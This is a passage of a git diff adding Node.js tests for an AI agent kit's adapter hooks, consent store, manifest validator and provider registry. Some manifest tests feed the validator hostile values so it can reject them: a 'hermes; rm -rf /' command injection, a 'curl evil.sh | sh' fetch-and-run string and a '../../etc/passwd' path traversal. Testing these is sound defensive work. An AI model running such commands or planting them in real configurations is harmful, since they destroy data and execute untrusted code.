+  assert.equal(result.stdout.trim(), literal);
+});
+
+test('a nonexistent binary reports ok:false without throwing', async () => {
+  const result = await runAdapterHook({
+    hook: { command: ['definitely-not-a-real-binary-xyz123'] },
+    hostId: 'claude', verb: 'discover',
+  });
+  assert.equal(result.ok, false);
+  assert.equal(result.exitCode, null);
+  assert.equal(result.stdout, '');
+  assert.ok(typeof result.detail === 'string' && result.detail.length > 0);
+});
+
+test('a hook that outlives its timeout is killed and reports ok:false with captured-so-far output', async () => {
+  const result = await runAdapterHook({
+    hook: {
+      command: [NODE, '-e', "console.log('before-sleep'); setTimeout(() => {}, 60000);"],
+    },
+    hostId: 'claude', verb: 'discover', timeoutMs: 200,
+  });
+  assert.equal(result.ok, false);
+  assert.equal(result.exitCode, null);
+  assert.ok(result.stdout.includes('before-sleep'), result.stdout);
+  assert.ok(/timed out/i.test(result.detail ?? ''), result.detail);
+});
+
+test('hook.timeoutMs and the caller timeoutMs both apply — the tighter one wins', async () => {
+  // hook declares a generous 60s budget; the caller imposes a much tighter
+  // 200ms ceiling. The call must not wait anywhere near 60s.
+  const start = Date.now();
+  const result = await runAdapterHook({
+    hook: {
+      command: [NODE, '-e', 'setTimeout(() => {}, 60000);'],
+      timeoutMs: 60_000,
+    },
+    hostId: 'claude', verb: 'discover', timeoutMs: 200,
+  });
+  const elapsedMs = Date.now() - start;
+  assert.equal(result.ok, false);
+  assert.ok(elapsedMs < 5_000, `expected the tighter 200ms timeout to win, took ${elapsedMs}ms`);
+});
+
+test('combined stdout+stderr output is capped at 256KB with a truncation marker', async () => {
+  const result = await runAdapterHook({
+    hook: {
+      command: [NODE, '-e', "process.stdout.write('a'.repeat(400 * 1024));"],
+    },
+    hostId: 'claude', verb: 'discover',
+  });
+  assert.equal(result.ok, true);
+  assert.ok(Buffer.byteLength(result.stdout, 'utf8') <= 256 * 1024 + 200);
+  assert.ok(/truncated/i.test(result.stdout));
+});
+
+test('env is minimal: PATH is present, an unrelated process.env canary is not', async () => {
+  process.env.AK_TEST_CANARY_SECRET = 'do-not-leak';
+  try {
+    const result = await runAdapterHook({
+      hook: {
+        command: [NODE, '-e', "console.log(JSON.stringify({ path: process.env.PATH ?? null, canary: process.env.AK_TEST_CANARY_SECRET ?? null }))"],
+      },
+      hostId: 'claude', verb: 'discover',
+    });
+    assert.equal(result.ok, true);
+    const parsed = JSON.parse(result.stdout.trim());
+    assert.ok(parsed.path, 'PATH must be present in the child env');
+    assert.equal(parsed.canary, null, 'unrelated process.env entries must not leak to the adapter');
+  } finally {
+    delete process.env.AK_TEST_CANARY_SECRET;
+  }
+});
+
+test('caller-passed env entries are forwarded to the hook', async () => {
+  const result = await runAdapterHook({
+    hook: {
+      command: [NODE, '-e', 'console.log(process.env.AK_TEST_ALLOWED ?? "MISSING")'],
+    },
+    hostId: 'claude', verb: 'discover', env: { AK_TEST_ALLOWED: 'yes' },
+  });
+  assert.equal(result.ok, true);
+  assert.ok(result.stdout.includes('yes'));
+});
+
+test('a non-zero exit is reported as ok:false with the exit code preserved', async () => {
+  const result = await runAdapterHook({
+    hook: { command: [NODE, '-e', 'process.exit(7)'] },
+    hostId: 'claude', verb: 'discover',
+  });
+  assert.equal(result.ok, false);
+  assert.equal(result.exitCode, 7);
+});
+
+// --- consent.mjs -----------------------------------------------------------
+
+function sandboxFile() {
+  const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'ak-adapter-consent-'));
+  return path.join(dir, 'nested', 'adapter-consent.json');
+}
+
+test('recordConsent then isTrusted with the same hash is trusted', () => {
+  const file = sandboxFile();
+  recordConsent('my-adapter', 'sha256:abc123', { file });
+  assert.equal(isTrusted('my-adapter', 'sha256:abc123', { file }), true);
+  assert.equal(recordedHashFor('my-adapter', { file }), 'sha256:abc123');
+  fs.rmSync(path.dirname(path.dirname(file)), { recursive: true, force: true });
+});
+
+test('a different hash (edited adapter) is untrusted', () => {
+  const file = sandboxFile();
+  recordConsent('my-adapter', 'sha256:abc123', { file });
+  assert.equal(isTrusted('my-adapter', 'sha256:def456', { file }), false);
+  fs.rmSync(path.dirname(path.dirname(file)), { recursive: true, force: true });
+});
+
+test('revokeConsent removes trust', () => {
+  const file = sandboxFile();
+  recordConsent('my-adapter', 'sha256:abc123', { file });
+  assert.equal(revokeConsent('my-adapter', { file }), true);
+  assert.equal(isTrusted('my-adapter', 'sha256:abc123', { file }), false);
+  assert.equal(recordedHashFor('my-adapter', { file }), null);
+  assert.equal(revokeConsent('my-adapter', { file }), false, 'revoking again finds nothing to remove');
+  fs.rmSync(path.dirname(path.dirname(file)), { recursive: true, force: true });
+});
+
+// POSIX-only: NTFS does not carry Unix permission bits, so `mode & 0o777`
+// never reflects the 0600 the store requests on Windows. The 0600 write is
+// still made (fs.writeFileSync mode option); this asserts the observable bits
+// where the platform has them.
+test('the consent file is written with mode 0600', { skip: process.platform === 'win32' }, () => {
+  const file = sandboxFile();
+  recordConsent('my-adapter', 'sha256:abc123', { file });
+  const mode = fs.statSync(file).mode & 0o777;
+  assert.equal(mode, 0o600);
+  fs.rmSync(path.dirname(path.dirname(file)), { recursive: true, force: true });
+});
+
+test('a missing consent file returns null/false without throwing', () => {
+  const file = path.join(os.tmpdir(), `ak-adapter-consent-missing-${process.pid}-${Date.now()}.json`);
+  assert.equal(recordedHashFor('my-adapter', { file }), null);
+  assert.equal(isTrusted('my-adapter', 'sha256:abc123', { file }), false);
+});
+
+test('adapterConsentPath resolves under the kit config dir', () => {
+  assert.ok(adapterConsentPath().endsWith(path.join('agentic-kit', 'adapter-consent.json')));
+});

--- a/tests/kit/adapter-manifest.test.mjs
+++ b/tests/kit/adapter-manifest.test.mjs
@@ -1,0 +1,283 @@
+// Adapter Contract Dossier — schema layer. Every structural cap must reject
+// a manifest at validation time (ineligible claims are INEXPRESSIBLE), each
+// with a distinguishable `.reason`, never merely at some later runtime check.
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
+import fs from 'node:fs';
+import path from 'node:path';
+import { fileURLToPath } from 'node:url';
+import {
+  validateAdapterManifest, DRIVING_SURFACES, MANIFEST_TRUST_KINDS, ManifestRejected,
+} from '../../src/lib/adapters/manifest.mjs';
+
+function validHost(overrides = {}) {
+  return {
+    id: 'hermes',
+    label: 'Hermes',
+    install: { bin: 'hermes', externalInstallPolicy: 'detect-never-overwrite' },
+    capabilities: {
+      canDriveSession: true, canBePrimary: false, canRouteActivities: true,
+      commandStatusline: false, transcripts: true, usage: false,
+      nativeMcpConfig: false, nativeGuidance: false,
+    },
+    trust: { approvalPolicy: 'unchanged', changes: [] },
+    enabledByDefault: false,
+    configProjection: 'ruflo',
+    observability: [],
+    ...overrides,
+  };
+}
+
+function validManifest(overrides = {}) {
+  return {
+    name: 'hermes',
+    version: '1.0.0',
+    contract: 1,
+    host: validHost(),
+    detection: { bin: 'hermes', versionArgs: ['--version'], versionPattern: '\\d+\\.\\d+\\.\\d+' },
+    driving: { surfaces: ['acp'] },
+    trust: {
+      changes: [{
+        id: 'hermes-subprocess-hooks', kind: 'third-party-adapter', scope: 'project',
+        owner: 'hermes', value: 'subprocess hooks', effect: 'run consented lifecycle hooks for hermes',
+      }],
+    },
+    ...overrides,
+  };
+}
+
+function rejects(value, reason) {
+  assert.throws(() => validateAdapterManifest(value), (error) => {
+    assert.ok(error instanceof ManifestRejected, `expected ManifestRejected, got ${error?.constructor?.name}`);
+    assert.equal(error.reason, reason, `expected reason '${reason}', got '${error.reason}': ${error.message}`);
+    return true;
+  });
+}
+
+test('accepts a minimal valid manifest and returns a frozen copy', () => {
+  const manifest = validateAdapterManifest(validManifest());
+  assert.equal(manifest.name, 'hermes');
+  assert.equal(manifest.contract, 1);
+  assert.equal(manifest.host.id, 'hermes');
+  assert.ok(Object.isFrozen(manifest));
+  assert.ok(Object.isFrozen(manifest.host));
+  assert.ok(Object.isFrozen(manifest.detection));
+});
+
+test('accepts an optional lifecycle block naming real verbs', () => {
+  const manifest = validateAdapterManifest(validManifest({
+    lifecycle: { detect: { hook: { command: ['hermes', 'detect'], timeoutMs: 5000 } } },
+  }));
+  assert.deepEqual(manifest.lifecycle.detect.hook.command, ['hermes', 'detect']);
+});
+
+test('omits lifecycle entirely when the manifest declares none', () => {
+  const manifest = validateAdapterManifest(validManifest());
+  assert.equal('lifecycle' in manifest, false);
+});
+
+test('DRIVING_SURFACES names the current driving vocabulary', () => {
+  assert.deepEqual([...DRIVING_SURFACES], ['cli-subprocess', 'acp', 'mcp']);
+});
+
+test('MANIFEST_TRUST_KINDS is the manifest-scoped trust vocabulary', () => {
+  assert.deepEqual([...MANIFEST_TRUST_KINDS], ['third-party-adapter']);
+});
+
+// ── structural caps ─────────────────────────────────────────────────────────
+
+test('cap: host.capabilities.canBePrimary:true is rejected, named reason', () => {
+  rejects(validManifest({ host: validHost({ capabilities: { ...validHost().capabilities, canBePrimary: true } }) }), 'cap-can-be-primary');
+});
+
+test('cap: host.capabilities.commandStatusline:true is rejected, named reason', () => {
+  rejects(validManifest({ host: validHost({ capabilities: { ...validHost().capabilities, commandStatusline: true } }) }), 'cap-command-statusline');
+});
+
+test('cap: a non-null host.legacy.aqeProvider is rejected, named reason', () => {
+  rejects(validManifest({ host: validHost({ legacy: { aqeProvider: 'claude-code' } }) }), 'cap-aqe-provider');
+});
+
+test('cap: host.legacy.aqeProvider: null is accepted (the honest default)', () => {
+  const manifest = validateAdapterManifest(validManifest({ host: validHost({ legacy: { aqeProvider: null } }) }));
+  assert.equal(manifest.host.legacy.aqeProvider, null);
+});
+
+test('cap: guidanceFile path traversal is rejected at schema level, named reason', () => {
+  rejects(validManifest({ host: validHost({ legacy: { guidanceFile: '../../etc/passwd' } }) }), 'invalid-guidance-file');
+});
+
+test('cap: a slug-shaped guidanceFile is accepted', () => {
+  const manifest = validateAdapterManifest(validManifest({ host: validHost({ legacy: { guidanceFile: 'hermes-guidance' } }) }));
+  assert.equal(manifest.host.legacy.guidanceFile, 'hermes-guidance');
+});
+
+// ── general structural validation ───────────────────────────────────────────
+
+test('manifest.name must be id-shaped', () => {
+  rejects(validManifest({ name: 'Hermes CLI!' }), 'invalid-id');
+});
+
+test('manifest.version must be semver', () => {
+  rejects(validManifest({ version: 'v1' }), 'invalid-version');
+});
+
+test('manifest.contract must be a positive integer', () => {
+  rejects(validManifest({ contract: 0 }), 'invalid-contract');
+  rejects(validManifest({ contract: '1' }), 'invalid-contract');
+});
+
+test('an invalid host sub-object is rejected with the wrapped host error', () => {
+  rejects(validManifest({ host: { ...validHost(), install: undefined } }), 'invalid-host');
+});
+
+test('detection.bin must be id-shaped (rejects shell-metacharacter payloads)', () => {
+  rejects(validManifest({ detection: { bin: 'hermes; rm -rf /' } }), 'invalid-detection');
+});
+
+test('detection.versionPattern must be a valid regular expression source', () => {
+  rejects(validManifest({ detection: { bin: 'hermes', versionPattern: '(unterminated' } }), 'invalid-detection');
+});
+
+test('driving.surfaces rejects an unknown surface', () => {
+  rejects(validManifest({ driving: { surfaces: ['telepathy'] } }), 'invalid-driving-surfaces');
+});
+
+test('driving.surfaces rejects an empty array', () => {
+  rejects(validManifest({ driving: { surfaces: [] } }), 'invalid-driving-surfaces');
+});
+
+test('lifecycle rejects an unknown verb key', () => {
+  rejects(validManifest({ lifecycle: { launch: { hook: { command: ['hermes'] } } } }), 'invalid-lifecycle-verb');
+});
+
+test('lifecycle rejects a hook with an empty command array', () => {
+  rejects(validManifest({ lifecycle: { detect: { hook: { command: [] } } } }), 'invalid-lifecycle-hook');
+});
+
+test('lifecycle rejects a non-positive hook timeoutMs', () => {
+  rejects(validManifest({ lifecycle: { detect: { hook: { command: ['hermes'], timeoutMs: 0 } } } }), 'invalid-lifecycle-hook');
+});
+
+test('trust.changes rejects a change missing required fields', () => {
+  rejects(validManifest({ trust: { changes: [{ id: 'x', kind: 'third-party-adapter', scope: 'project' }] } }), 'invalid-trust');
+});
+
+test('trust.changes rejects an unknown kind', () => {
+  rejects(validManifest({ trust: { changes: [{ id: 'x', kind: 'auto-approve', scope: 'project', owner: 'a', value: 'b', effect: 'c' }] } }), 'invalid-trust');
+});
+
+test('trust.changes rejects a duplicate id', () => {
+  rejects(validManifest({
+    trust: {
+      changes: [
+        { id: 'dup', kind: 'third-party-adapter', scope: 'project', owner: 'a', value: 'b', effect: 'c' },
+        { id: 'dup', kind: 'third-party-adapter', scope: 'project', owner: 'a', value: 'b', effect: 'c' },
+      ],
+    },
+  }), 'invalid-trust');
+});
+
+// ── P0-A: strict allowlists (Wave 4 security remediation) ──────────────────
+// Before this fix, an unrecognized TOP-LEVEL key was silently DROPPED (not
+// rejected) before hashing — so a consent hash could cover content the
+// operator never reviewed — and unrecognized NESTED keys under host/
+// host.install/host.legacy survived verbatim (those sub-validators
+// structuredClone the whole input). Every case below must now be REFUSED,
+// not silently dropped or passed through.
+
+test('unknown-field: an extraneous top-level key is refused, not silently dropped', () => {
+  rejects(validManifest({ postInstall: 'curl evil.sh | sh' }), 'unknown-field');
+});
+
+test('unknown-field: an extraneous host key is refused, not silently passed through', () => {
+  rejects(validManifest({ host: { ...validHost(), evilField: { rce: true } } }), 'unknown-field');
+});
+
+test('unknown-field: an extraneous host.install key is refused', () => {
+  rejects(validManifest({
+    host: validHost({ install: { bin: 'hermes', externalInstallPolicy: 'detect-never-overwrite', rce: true } }),
+  }), 'unknown-field');
+});
+
+test('unknown-field: an extraneous host.legacy key is refused (not merely an unused one)', () => {
+  rejects(validManifest({ host: validHost({ legacy: { evilField: 'rce' } }) }), 'unknown-field');
+});
+
+test('external-npm-package: host.install.npmPackage is forbidden for an external adapter', () => {
+  rejects(validManifest({
+    host: validHost({ install: { bin: 'hermes', npmPackage: 'evil-pkg', externalInstallPolicy: 'detect-never-overwrite' } }),
+  }), 'external-npm-package');
+});
+
+test('invalid-install-bin: an absolute path is rejected', () => {
+  rejects(validManifest({
+    host: validHost({ install: { bin: '/abs/evil', externalInstallPolicy: 'detect-never-overwrite' } }),
+  }), 'invalid-install-bin');
+});
+
+test('invalid-install-bin: a path-traversal token is rejected', () => {
+  rejects(validManifest({
+    host: validHost({ install: { bin: '../../x', externalInstallPolicy: 'detect-never-overwrite' } }),
+  }), 'invalid-install-bin');
+});
+
+test('legitimate legacy fields (the built-ins actually use) still round-trip', () => {
+  const manifest = validateAdapterManifest(validManifest({
+    host: validHost({
+      legacy: {
+        guidanceFile: 'hermes-guidance', configFormat: 'json',
+        statusline: { mode: 'builtin' }, aqeProvider: null, envMarkers: ['HERMES_SESSION'], enableEnv: 'ENABLE_HERMES',
+      },
+    }),
+  }));
+  assert.equal(manifest.host.legacy.enableEnv, 'ENABLE_HERMES');
+  assert.deepEqual(manifest.host.legacy.envMarkers, ['HERMES_SESSION']);
+});
+
+test('a legitimate host.auth block still round-trips (a real downstream reader, hosts.mjs)', () => {
+  const manifest = validateAdapterManifest(validManifest({
+    host: validHost({ auth: { apiKeyEnv: ['HERMES_API_KEY'], loginFile: ['.hermes', 'auth.json'], keyOverridesLogin: false } }),
+  }));
+  assert.deepEqual(manifest.host.auth.apiKeyEnv, ['HERMES_API_KEY']);
+});
+
+test('the real acme fixture manifest still admits after the allowlist tightening', () => {
+  const fixture = JSON.parse(fs.readFileSync(
+    path.join(path.dirname(fileURLToPath(import.meta.url)), '../fixtures/adapters/acme/manifest.json'),
+    'utf8',
+  ));
+  const manifest = validateAdapterManifest(fixture);
+  assert.equal(manifest.host.id, 'acme');
+});
+
+// ── Completeness: the allowlist is uniform across every sub-structure, so the
+// "structural caps are inexpressible" property holds at every level, not just
+// top-level and host (lead's post-review hardening). ──
+test('unknown-field: an extraneous detection key is refused', () => {
+  rejects(validManifest({ detection: { bin: 'hermes', evilProbe: 'x' } }), 'unknown-field');
+});
+
+test('unknown-field: an extraneous driving key is refused', () => {
+  rejects(validManifest({ driving: { surfaces: ['acp'], escalate: true } }), 'unknown-field');
+});
+
+test('unknown-field: an extraneous lifecycle hook key is refused', () => {
+  rejects(validManifest({
+    lifecycle: { detect: { hook: { command: ['hermes', 'detect'], cwd: '/tmp' } } },
+  }), 'unknown-field');
+});
+
+test('unknown-field: an extraneous trust-change key is refused', () => {
+  rejects(validManifest({
+    trust: { changes: [{
+      id: 'x', kind: 'third-party-adapter', scope: 'project',
+      owner: 'h', value: 'v', effect: 'e', escalate: true,
+    }] },
+  }), 'unknown-field');
+});
+
+test('unknown-field: an extra or miscased capability key cannot ride along inert', () => {
+  rejects(validManifest({ host: validHost({ capabilities: { ...validHost().capabilities, CanBePrimary: true } }) }), 'unknown-field');
+  rejects(validManifest({ host: validHost({ capabilities: { ...validHost().capabilities, ADMIN: true } }) }), 'unknown-field');
+});

--- a/tests/kit/adapter-registries.test.mjs
+++ b/tests/kit/adapter-registries.test.mjs
@@ -8,6 +8,7 @@ import {
   validateRegistries,
   validateHostAdapter,
   defaultHostMap,
+  assertValidBinding,
 } from '../../src/lib/adapters/index.mjs';
 import {
   validHost, validProvider, validRegistries,
@@ -150,4 +151,150 @@ test('validateHostAdapter rejects a host with a missing or non-boolean enabledBy
 test('validateHostAdapter accepts a host with an explicit boolean enabledByDefault', () => {
   assert.doesNotThrow(() => validateHostAdapter(validHost({ enabledByDefault: true })));
   assert.doesNotThrow(() => validateHostAdapter(validHost({ enabledByDefault: false })));
+});
+
+// ── F-28: providerEntries moved from a tuple-array `.map` (capabilities derived
+// by identity comparison, e.g. `modelDiscovery: id === 'ollama'`) to explicit
+// per-entry object records — the same style hostEntries already uses. That
+// construction could not express a second local provider needing pricing
+// 'zero' WITHOUT modelDiscovery (ADR-0028's local-openai). This test hardcodes
+// the five pre-existing rows' expected shape (not re-derived from the source)
+// so the refactor cannot silently change what ships. See also ADR-0028.
+test('F-28: the five pre-existing providers are unchanged by the per-entry rewrite', () => {
+  const byId = Object.fromEntries(PROVIDER_REGISTRY.map((entry) => [entry.id, entry]));
+  assert.deepEqual(byId.anthropic, {
+    id: 'anthropic', label: 'Anthropic', billing: 'subscription',
+    credentials: { kind: 'host-login' }, transports: ['native'], projections: ['claude'], observability: [],
+    legacy: { apiProvider: true },
+    capabilities: {
+      modelDiscovery: false, runtimeDiscovery: false, pricing: 'provider-specific',
+      quota: true, cacheAccounting: 'provider-dependent',
+    },
+  });
+  assert.deepEqual(byId.openai, {
+    id: 'openai', label: 'OpenAI', billing: 'subscription',
+    credentials: { kind: 'host-login' }, transports: ['native', 'openai-compatible'], projections: ['codex'], observability: [],
+    legacy: { apiProvider: true },
+    capabilities: {
+      modelDiscovery: false, runtimeDiscovery: false, pricing: 'provider-specific',
+      quota: true, cacheAccounting: 'provider-dependent',
+    },
+  });
+  assert.deepEqual(byId.google, {
+    id: 'google', label: 'Google Gemini', billing: 'metered',
+    credentials: { kind: 'environment', env: ['GOOGLE_API_KEY', 'GEMINI_API_KEY'] },
+    transports: ['native'], projections: ['ruflo', 'aqe'], observability: [],
+    legacy: { apiProvider: true },
+    capabilities: {
+      modelDiscovery: false, runtimeDiscovery: false, pricing: 'provider-specific',
+      quota: false, cacheAccounting: 'provider-dependent',
+    },
+  });
+  assert.deepEqual(byId.openrouter, {
+    id: 'openrouter', label: 'OpenRouter', billing: 'metered',
+    credentials: { kind: 'environment', env: ['OPENROUTER_API_KEY'] },
+    transports: ['openai-compatible'], projections: ['ruflo', 'aqe', 'claude', 'codex', 'opencode'],
+    observability: ['openrouter-metadata'],
+    legacy: { apiProvider: false },
+    capabilities: {
+      modelDiscovery: false, runtimeDiscovery: false, pricing: 'dated-offline',
+      quota: false, cacheAccounting: 'provider-dependent',
+    },
+  });
+  assert.deepEqual(byId.ollama, {
+    id: 'ollama', label: 'Ollama', billing: 'local',
+    credentials: { kind: 'none' },
+    transports: ['native', 'openai-compatible', 'anthropic-compatible'],
+    projections: ['ruflo', 'aqe', 'claude', 'codex', 'opencode'],
+    observability: ['ollama-catalog', 'ollama-runtime'],
+    legacy: { apiProvider: true },
+    capabilities: {
+      modelDiscovery: true, runtimeDiscovery: true, pricing: 'zero',
+      quota: false, cacheAccounting: 'unknown',
+    },
+  });
+});
+
+// ADR-0028: one generic local provider for any OpenAI-compatible model server
+// on loopback (MLX, LM Studio, llama.cpp, vLLM, user-named endpoints), instead
+// of enumerating vendors.
+test('ADR-0028: local-openai is registered with the accepted shape', () => {
+  const localOpenai = PROVIDER_REGISTRY.find((entry) => entry.id === 'local-openai');
+  assert.ok(localOpenai, 'local-openai must be registered');
+  assert.equal(localOpenai.billing, 'local');
+  assert.deepEqual(localOpenai.credentials, { kind: 'none' });
+  assert.deepEqual(localOpenai.transports, ['openai-compatible']);
+  // Deliberate asymmetry vs ollama: no 'aqe' (ollama is an AQE provider type,
+  // local-openai is not) and no 'claude' (claude's projection expects an
+  // anthropic-compatible surface; local-openai claims only openai-compatible).
+  assert.deepEqual(localOpenai.projections, ['ruflo', 'codex', 'opencode']);
+  assert.deepEqual(localOpenai.observability, []);
+  assert.deepEqual(localOpenai.capabilities, {
+    modelDiscovery: false, runtimeDiscovery: false, pricing: 'zero',
+    quota: false, cacheAccounting: 'unknown',
+  });
+});
+
+test('PROVIDER_REGISTRY has exactly six entries after the local-openai addition', () => {
+  assert.deepEqual(PROVIDER_REGISTRY.map((entry) => entry.id).sort(), [
+    'anthropic', 'google', 'local-openai', 'ollama', 'openai', 'openrouter',
+  ]);
+});
+
+// assertValidBinding gating: local-openai's projections/transports are
+// exercised end-to-end through a user-declared binding, both the accepted
+// shape and the rejections the accepted ADR design implies.
+test('assertValidBinding accepts a user-declared local-openai binding on codex', () => {
+  const binding = assertValidBinding({
+    id: 'local-openai-via-codex', host: 'codex', provider: 'local-openai',
+    transport: 'openai-compatible', endpoint: 'http://127.0.0.1:8080/v1',
+    provenance: 'configured',
+  });
+  assert.equal(binding.provider, 'local-openai');
+  assert.equal(binding.projection, 'codex');
+});
+
+test('assertValidBinding rejects a local-openai binding on the native transport', () => {
+  assert.throws(() => assertValidBinding({
+    id: 'local-openai-native', host: 'codex', provider: 'local-openai',
+    transport: 'native', endpoint: 'http://127.0.0.1:8080/v1', provenance: 'configured',
+  }), /unsupported transport/);
+});
+
+test('assertValidBinding rejects local-openai for the aqe projection', () => {
+  assert.throws(() => assertValidBinding({
+    id: 'local-openai-aqe', host: 'codex', provider: 'local-openai',
+    transport: 'openai-compatible', endpoint: 'http://127.0.0.1:8080/v1',
+    projection: 'aqe', provenance: 'configured',
+  }), /does not support projection aqe/);
+});
+
+test('assertValidBinding rejects local-openai on claude host default projection', () => {
+  assert.throws(() => assertValidBinding({
+    id: 'local-openai-claude', host: 'claude', provider: 'local-openai',
+    transport: 'openai-compatible', endpoint: 'http://127.0.0.1:8080/v1',
+    provenance: 'configured',
+  }), /does not support projection claude/);
+});
+
+// Endpoint topology pin (review nit): "local" is a BILLING claim (user-run,
+// $0 — ADR-0011), not a loopback constraint. A user-run server on another
+// machine is legal over https; plain http stays loopback-only
+// (validateEndpoint's remote-http rule). Pinned so a future "tighten local
+// to loopback" change is a deliberate decision, not drift.
+test('assertValidBinding accepts a remote https endpoint for local-openai (billing, not topology)', () => {
+  const binding = assertValidBinding({
+    id: 'local-openai-lan', host: 'codex', provider: 'local-openai',
+    transport: 'openai-compatible', endpoint: 'https://models.lan.example/v1',
+    provenance: 'configured',
+  });
+  assert.equal(binding.endpoint, 'https://models.lan.example/v1');
+});
+
+test('assertValidBinding rejects a remote plain-http endpoint for local-openai', () => {
+  assert.throws(() => assertValidBinding({
+    id: 'local-openai-remote-http', host: 'codex', provider: 'local-openai',
+    transport: 'openai-compatible', endpoint: 'http://models.lan.example/v1',
+    provenance: 'configured',
+  }), /remote-http/);
 });

--- a/tests/kit/execution-runner.test.mjs
+++ b/tests/kit/execution-runner.test.mjs
@@ -1,6 +1,7 @@
 import { test } from 'node:test';
 import assert from 'node:assert/strict';
 import { EXECUTION_ADAPTERS, assertBuiltinAdaptersRoutable, executionAdapterFor } from '../../src/lib/execution/adapters.mjs';
+import { applyAdmitted, resetAdmitted } from '../../src/lib/adapters/admitted.mjs';
 import { executeRunPlan } from '../../src/lib/execution/runner.mjs';
 
 const worker = (id, host = 'opencode', dependsOn) => ({ id, activity: 'implementation', role: 'coder', host, prompt: id, ...(dependsOn ? { dependsOn } : {}) });
@@ -490,6 +491,30 @@ test('executionAdapterFor resolves built-ins identically to the old map, and nul
   assert.equal(executionAdapterFor('codex'), EXECUTION_ADAPTERS.get('codex'));
   assert.equal(executionAdapterFor('opencode'), EXECUTION_ADAPTERS.get('opencode'));
   assert.equal(executionAdapterFor('future-host'), null);
+});
+
+// P2 finding 10: executionAdapterFor used to have a dead branch
+// (`if (admittedHostIds().includes(hostId)) return null;`) that returned
+// null either way — same as the fallthrough below it. Pinning that removing
+// it changed no observable behavior: an admitted host still resolves to
+// null (admitted hosts have no execution adapter this wave, full stop).
+test('executionAdapterFor returns null for an admitted host id too (no execution adapter this wave)', () => {
+  applyAdmitted([{
+    entry: {
+      id: 'admitted-probe', label: 'Probe', install: { bin: 'admitted-probe', externalInstallPolicy: 'detect-never-overwrite' },
+      capabilities: {
+        canDriveSession: true, canBePrimary: false, canRouteActivities: false,
+        commandStatusline: false, transcripts: false, usage: false, nativeMcpConfig: false, nativeGuidance: false,
+      },
+      trust: { approvalPolicy: 'unchanged', changes: [] },
+      enabledByDefault: false, configProjection: 'ruflo', observability: [],
+    },
+  }]);
+  try {
+    assert.equal(executionAdapterFor('admitted-probe'), null);
+  } finally {
+    resetAdmitted();
+  }
 });
 
 // #88 (amended W1-B): a routed plan naming a host with no built-in adapter

--- a/tests/kit/execution-runner.test.mjs
+++ b/tests/kit/execution-runner.test.mjs
@@ -1,6 +1,6 @@
 import { test } from 'node:test';
 import assert from 'node:assert/strict';
-import { EXECUTION_ADAPTERS } from '../../src/lib/execution/adapters.mjs';
+import { EXECUTION_ADAPTERS, assertBuiltinAdaptersRoutable, executionAdapterFor } from '../../src/lib/execution/adapters.mjs';
 import { executeRunPlan } from '../../src/lib/execution/runner.mjs';
 
 const worker = (id, host = 'opencode', dependsOn) => ({ id, activity: 'implementation', role: 'coder', host, prompt: id, ...(dependsOn ? { dependsOn } : {}) });
@@ -452,11 +452,12 @@ test('runner reports an unknown host without attempting a lifecycle', async () =
   assert.match(result.failure.reason, /no execution adapter/);
 });
 
-// #88: the construction invariant — every routable host has an execution
-// adapter and vice versa, enforced at import. A fresh process import must
-// never throw; a violating edit fails here (and at import) instead of at
-// runtime with cli_unavailable on every worker.
-test('routable hosts and execution adapters cannot drift apart (construction invariant)', async () => {
+// #88 (amended W1-B): the construction invariant now only enforces the
+// built-in -> registry direction. A fresh process import must never throw
+// against the real registry; a violating in-tree edit (a built-in adapter
+// wired for a host the registry doesn't mark routable) still fails at
+// import, never silently at runtime.
+test('a fresh process imports the real execution adapters registry cleanly (construction invariant)', async () => {
   const { spawnSync } = await import('node:child_process');
   const { fileURLToPath } = await import('node:url');
   const path = await import('node:path');
@@ -466,6 +467,43 @@ test('routable hosts and execution adapters cannot drift apart (construction inv
   ], { encoding: 'utf8', cwd: repo });
   assert.equal(r.status, 0, `execution adapters module must import cleanly:\n${r.stderr}`);
   assert.match(r.stdout, /in-sync/);
+});
+
+// #88 (amended W1-B): a built-in adapter for a host the registry no longer
+// marks routable is still an in-tree wiring mistake — this direction keeps
+// throwing loudly, naming the offending host(s).
+test('a built-in adapter for a non-routable host still throws (in-tree wiring mistake)', () => {
+  assert.throws(() => assertBuiltinAdaptersRoutable(['codex', 'opencode']),
+    /adapter\(s\) for non-routable host\(s\): claude/);
+});
+
+// #88 (amended W1-B): the reverse direction — a registry host marked
+// routable with NO built-in adapter — is now a legitimate merge-seam gap,
+// not a construction error. This is exactly the scenario a future registry
+// entry (canRouteActivities:true, adapter landing in a later wave) creates.
+test('a routable registry host with no built-in adapter does NOT throw at import (merge seam)', () => {
+  assert.doesNotThrow(() => assertBuiltinAdaptersRoutable(['claude', 'codex', 'opencode', 'future-host']));
+});
+
+test('executionAdapterFor resolves built-ins identically to the old map, and null for an unwired host', () => {
+  assert.equal(executionAdapterFor('claude'), EXECUTION_ADAPTERS.get('claude'));
+  assert.equal(executionAdapterFor('codex'), EXECUTION_ADAPTERS.get('codex'));
+  assert.equal(executionAdapterFor('opencode'), EXECUTION_ADAPTERS.get('opencode'));
+  assert.equal(executionAdapterFor('future-host'), null);
+});
+
+// #88 (amended W1-B): a routed plan naming a host with no built-in adapter
+// degrades that one worker instead of crashing the run. This is the SAME
+// code path as "runner reports an unknown host without attempting a
+// lifecycle" above — adapterFor() only cares whether an adapter is wired,
+// never whether the registry calls the host routable — so a
+// routable-but-unadapted host (this wave's actual failure mode) degrades
+// identically to a wholly unknown one.
+test('a routed plan naming a routable-but-unadapted host degrades that worker (cli_unavailable), never crashes', async () => {
+  const [result] = await executeRunPlan({ workers: [worker('a', 'future-host')] }, { clock });
+  assert.equal(result.status, 'failed');
+  assert.equal(result.exitCategory, 'cli_unavailable');
+  assert.match(result.failure.reason, /no execution adapter/);
 });
 
 // #88 test-gap: plan-validation guards — removing any of these converts a

--- a/tests/kit/guidance-targets.test.mjs
+++ b/tests/kit/guidance-targets.test.mjs
@@ -7,6 +7,7 @@ import {
   guidanceTargets, retiredForTarget, blocksForTarget, syncBlocks, registry, BUILTIN_BLOCKS,
 } from '../../src/lib/blocks.mjs';
 import { codexDir, codexAgentsMdPath, home, claudeMdPath } from '../../src/lib/paths.mjs';
+import { HOST_REGISTRY } from '../../src/lib/adapters/index.mjs';
 
 const block = (slug, body) => `<!-- BEGIN ${slug} -->\n${body}\n<!-- END ${slug} -->\n`;
 
@@ -52,6 +53,121 @@ test('guidanceTargets defaults codexRoot to the real ~/.codex path', () => {
   assert.equal(targets.some((t) => t.name === 'agents-user'), hasCodex);
 });
 
